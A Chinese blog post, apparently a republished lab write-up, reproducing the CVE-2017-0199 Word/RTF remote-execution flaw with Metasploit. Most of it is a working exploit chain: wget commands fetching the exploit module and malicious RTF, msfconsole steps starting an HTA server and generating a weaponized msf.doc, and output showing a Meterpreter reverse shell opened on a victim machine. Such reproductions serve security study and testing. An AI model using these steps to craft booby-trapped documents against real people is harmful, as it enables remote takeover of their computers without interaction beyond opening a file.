cve-2017-0199&metasploit复现过程-白红宇

强烈建议你试试无所不能的chatGPT，快点击我

cve-2017-0199&metasploit复现过程

阅读量：5094 次

发布时间：2019-06-13

本文共 5272 字，大约阅读时间需要 17 分钟。

CVE-2017-0199 WORD/RTF嵌入OLE调用远程文件执行的一个漏洞。不需要用户交互。打开文档即中招

首先更新msf到最新,据说最新版简化了利用过程,不需要开启hta这一步.但没测成功还是按老方法

更新msf,增加国内源

1 #清华大学 2 #deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free 3 #deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free 4  5 #浙大 6 #deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free 7 #deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free 8  9 #东软大学10 #deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib11 #deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib12 13 #官方源14 #deb http://http.kali.org/kali kali-rolling main non-free contrib15 #deb-src http://http.kali.org/kali kali-rolling main non-free contrib

没用阿里云的是因为用阿里云的源更新时,提示hash校验失败.

1 apt-get clean && apt-get update -y && apt-get -f upgrade -y2 msfupdate

下载对应exploit

1 cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat2 wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/modules/exploits/windows/fileformat/office_word_hta.rb

下载cve-2017-0199.rtf:

1 cd /usr/share/metasploit-framework/data/exploits2 wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/data/exploits/cve-2017-0199.rtf

开启HTA:

1 root@kali:~# msfconsole 2                                                    3      ,           , 4     /             \ 5    ((__---,,,---__)) 6       (_) O O (_)_________ 7          \ _ /            |\ 8           o_o \   M S F   | \ 9                \   _____  |  *10                 |||   WW|||11                 |||     |||12 13 14 Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro15 Learn more on http://rapid7.com/metasploit16 17        =[ metasploit v4.14.14-dev                         ]18 + -- --=[ 1642 exploits - 945 auxiliary - 289 post        ]19 + -- --=[ 473 payloads - 40 encoders - 9 nops             ]20 + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]21 22 msf > use exploit/windows/misc/hta_server 23 msf exploit(hta_server) > show options 24 25 Module options (exploit/windows/misc/hta_server):26 27    Name     Current Setting  Required  Description28    ----     ---------------  --------  -----------29    SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.030    SRVPORT  8080             yes       The local port to listen on.31    SSL      false            no        Negotiate SSL for incoming connections32    SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)33    URIPATH                   no        The URI to use for this exploit (default is random)34 35 36 Exploit target:37 38    Id  Name39    --  ----40    0   Powershell x8641 42 43 msf exploit(hta_server) > run44 [*] Exploit running as background job.45 46 [*] Started reverse TCP handler on 192.168.1.101:4444 47 [*] Using URL: http://0.0.0.0:8080/h48EGx964y.hta48 [*] Local IP: http://192.168.1.101:8080/h48EGx964y.hta49 [*] Server started.50 msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta51 msf exploit(office_word_hta) > show options 52 53 Module options (exploit/windows/fileformat/office_word_hta):54 55    Name       Current Setting              Required  Description56    ----       ---------------              --------  -----------57    FILENAME                                no        The file name.58    TARGETURI  http://example.com/test.rtf  yes       The path to a online hta file.59 60 61 Exploit target:62 63    Id  Name64    --  ----65    0   Microsoft Office Word

生成payload doc文档:

1 msf exploit(office_word_hta) > set TARGETURI http://192.168.1.101:8080/h48EGx964y.hta 2 TARGETURI => http://192.168.1.101:8080/h48EGx964y.hta 3 msf exploit(office_word_hta) > set FILENAME msf.doc 4 FILENAME => msf.doc 5 msf exploit(office_word_hta) > run 6  7 [+] msf.doc stored at /root/.msf4/local/msf.doc 8 msf exploit(office_word_hta) >  9 msf exploit(office_word_hta) > 10 msf exploit(office_word_hta) > 11 msf exploit(office_word_hta) > 12 msf exploit(office_word_hta) > 13 msf exploit(office_word_hta) > 14 msf exploit(office_word_hta) > 15 16 msf exploit(office_word_hta) > 17 msf exploit(office_word_hta) > 18 msf exploit(office_word_hta) > 19 msf exploit(office_word_hta) > 20 msf exploit(office_word_hta) > 21 msf exploit(office_word_hta) > 22 [*] 192.168.1.108    hta_server - Delivering Payload23 [*] 192.168.1.108    hta_server - Delivering Payload24 [*] Sending stage (957487 bytes) to 192.168.1.10825 [*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.108:11021) at 2017-05-03 00:30:58 +080026 27 msf exploit(office_word_hta) > sessions -i28 29 Active sessions30 ===============31 32   Id  Type                     Information       Connection33   --  ----                     -----------       ----------34   1   meterpreter x86/windows  FEIYU\yu @ FEIYU  192.168.1.101:4444 -> 192.168.1.108:11021 (192.168.1.108)35 36 msf exploit(office_word_hta) > session 137 [-] Unknown command: session.38 msf exploit(office_word_hta) > sessions -i 139 [*] Starting interaction with 1...

去目标机上看下:

需要注意的是,不是所有版本都支持,比如我的office plus 2013

转载于:https://www.cnblogs.com/nayu/p/6799912.html

你可能感兴趣的文章

前端（HTML/CSS/JS）-HTML编码规范

C#判断操作系统的位数

项目管理之代码合并

[插件]使用juery-ui插件拖拽盒子后，盒子不见了

impala系列: 字符串函数

基础知识点（一）

T-SQL查询处理详解（续）

参数转换器执行流程

实验七——函数定义及调用总结

高性能的网络游戏服务器的设计。。。作者谈了QQGAME SERVER。。。（转）

原生 javascript 学习之 js变量

Journey to SQLAuthority

重写toString()

How to use Reflector to see the code of .net framework

[hihocoder][Offer收割]编程练习赛43

C#学习笔记（十七）：委托、事件、观察者模式、匿名委托和lambert表达式

Img2Base64Util，图片转base64码

实验吧之Canon

利用面对对象重写 atm

喝酒易醉，品茶养心，人生如梦，品茶悟道，何以解忧？唯有杜康！-- 愿君每日到此一游！

当前时间: 2024-11-17 04:49:58 当前IP: 3.137.184.197 联系邮箱:javaeecc@qq.com Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2

强烈建议你试试无所不能的CHAT-GPT，快点击我

强烈建议你试试无所不能的CHAT-GPT，快点击我